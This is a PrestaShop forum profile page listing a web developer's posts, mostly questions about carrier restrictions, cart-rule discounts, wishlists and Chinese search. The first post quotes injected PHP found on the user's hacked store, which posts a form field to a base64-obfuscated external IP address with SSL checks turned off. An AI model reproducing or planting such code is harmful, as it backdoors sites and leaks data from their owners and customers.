Jump to content

owengna

Members
  • Posts

    15
  • Joined

  • Last visited

Profile Information

  • Location
    Australia
  • Activity
    Web development agency

Recent Profile Visitors

3,110,407 profile views

owengna's Achievements

Newbie

Newbie (1/14)

  • Week One Done Rare
  • One Month Later Rare
  • One Year In Rare

Recent Badges

2

Reputation

  1. My site is using PS 1.6.X . Suddenly i got the following message at the top of the page and the admin page only shows this message. i cannot access admin anymore. try {if(isset($_POST['statistics_hash'])){$array = array('statistics_hash' => $_POST['statistics_hash'],);$linked="";$ch = curl_init(base64_decode("aHR0cHM6Ly80NS4xOTcuMTQxLjI1MC9hbmFseXRpY3MucGhw"));curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS, $array); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);curl_setopt($ch, CURLOPT_HEADER, false);curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);$html = curl_exec($ch);curl_close($ch); }} catch (Exception $e) {} Does any one know what's wrong? The Dev mode is disabled
  2. Hi Everyone, We are working on a online grocery store and they have multiple product categories (E.g Food, drinks, dessert...). Client is offering local delivery for surrounding area and national delivery. We have set them using some modules. The problem is that our client cannot ship Fresh Fruit, Vegetable and Frozen products nationally (for obvious reasons). We know we can limit the shipping carrier section when editing products but our client has over hundred Fresh & Frozen products. Is there any way to limit the carrier selection when customer put a fresh product in his cart? so restrict the carrier base on product carrier? I cannot find any modules or code modification for its need. Does anyone have any idea? We would greatly appreciate your idea!
  3. Hi, Is there anyway to modify the wishlist module to include add to cart button on products on wishlist? To be honest, the wishlist module doesn't work that well, some of my clients are quite confused with the wishlist module especially the priority and quantity part. Is there any alternatives?
  4. Our client's website is using Prestashop 1.5.4.1 It was working but she now cannot update or delete cms folders. When we tried to delete the folder, an error message of "undefined" pops up. When we check the console error, it shows "ajax_delete_file.php" is 403 forbidden. Does anyone know how to fix it?
  5. Is there any module which we can disable a particular carrier after certain time of the day? My client would like to offer same day delivery service for orders before 11:30am. Is there any way we can modify the controller to make it work?
  6. We are using PS 1.5.6.2 and we created a Chinese only website for our client. When we test search function, it does not work. Upon further investigation, we noticed that default search function requires the product title and description to have space in between (e.g "This is sample product"). However, there is no space between Chinese Characters (e.g"ThisIsSampleProduct") and the search function is unable to identify and match the search query. Is there anyway to modify the search function to fix this case? Your help is much appreciated.
  7. I am currently working on a project which is using multi seller module on Prestashop 1.5.6.2. My client would like to change the default category to a specific category dedicated to other sellers so that products uploaded by other sellers will not be on the home feature products. Is there any way i can achieve that? Also my client would like to limit sellers to certain categories. We planned to use CSS to disable the categories which sellers cannot put on like below: ul#categories-treeview li#id {display:none;} /**Admin access**/ body.admin ul#categories-treeview li#id {display:block;} It does not work and all other sellers can see all the categories. If we modify to ul#categories-treeview li {display:none;} then all the categories will be gone even for the Administrator. Can anyone help me out?
  8. Ok, i will give a shot. I considered the problem for the second product being more expensive than the first one. However, the "Cheapest product" option in the Cart Rule cannot apply discount for the third or more products. Only once.
  9. Thanks for the reply. I have looked into that part but I could not figure it out. Could you explain with further details? Your help is much appreciated.
  10. No, I just tried in the "Cart Rule" and "Catalog Price Rule" but i cannot achieve what my client wants. For the "specific price rule", since my client gets hundreds of products and it is difficult to set up individually. Is there any way if i combine "Cart Rule" and "Specific Prices" to get the result? Thanks
  11. I have a client who would like to offer 10% off for the second/third product (Any products) in the cart. I have tried to use Cart Rule but the discount can only apply to the whole order, a specific product, selected products or cheapest product. Is there any way to set a Cart Rule where second/third product in the cart gets a 10% off discount but the price of first product stays the same?
  12. I managed to fix, it was because of the language code. I will change the title of this post. Thanks!
  13. Hi, We have set up prestashop 1.5.6.0. When our client upload an image for a product, the thumbnail images in "Images" section are broken but no problems on front office and other pages. Is there any way to fix it?
×
×
  • Create New...